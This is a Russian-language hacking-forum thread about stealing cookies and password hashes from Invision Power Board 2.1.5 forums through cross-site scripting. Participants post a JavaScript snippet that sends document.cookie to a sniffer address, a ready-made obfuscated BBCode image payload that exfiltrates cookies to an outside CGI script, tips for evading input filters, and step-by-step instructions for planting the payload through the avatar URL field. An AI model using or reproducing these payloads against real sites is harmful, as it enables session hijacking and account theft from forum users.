Форумы Invision 2.1.5 Xss

Вобшем как можно унать хэш на это версии движка,
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.

 

а попробовать? не работает.

 

Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4

 

Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.

 

sexxx, никак, пока XSSбаги там не нашли.

 

Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
Можно через аватарку попробовать вроде бы. Но это только под Ie.

 

вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

 

Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

P.S.: В инете искать пробовали?

 

Работает спасибо ))
а теперь после того как получил алерт что мне делать?
заранее спасибо

 

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)

 

Вроде похоже на
http://forum.antichat.ru/thread15709.html

 

Не понял вместо


XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
???

 

Попробал вот это


и вот что мне выдал
Sorry, dynamic pages in the tags are not allowed

вместо знака вопроса пробавл вот это %3F затем ? и это &#63

 

Там надо пропустить тебе через http://ha.ckers.org/xss.html вот эти символы:
" пробел ; ' + ?
возможно еще [ ]

Хм... Ты не правильно меня понял... Я не имел ввиду вставить в алерт вместо слова XSS я имел вставить вместо алерта. Т.е. после слова javascript =)

 

Хмм.. Ну никак не удаётся протащить ? и ;

 

там хэши наскоко помню соленые так что толку от xss ...

 

Почитать внутренние форумы и личные мессаги. Ещё поиграться.

 

Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar

Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук:

Code:

[im*g]j	a	v	a	s	c	r	i	p	t:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/im*g]

пояснение:
1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел.
3)Этот код пашет токо под ИЕ.
4)Убираем звездочки только с тегов

ПС просьба репу добавлять CinerX, а не _CinerX

 

Для Ipb 2.1.5:
Заходим в профиль => смена аватары. Сохраняем страницу на винт редактируем, чтоб не было ограничений на ввод урла аватары. Ввобим код выши в поле грузить с урл и жмем сохранить аватару. Вот и все =)

ПС репу поднимаем CinerX, а не _CinerX

 

Sorry, that is not a valid file extension

У меня не получаеться ничего (((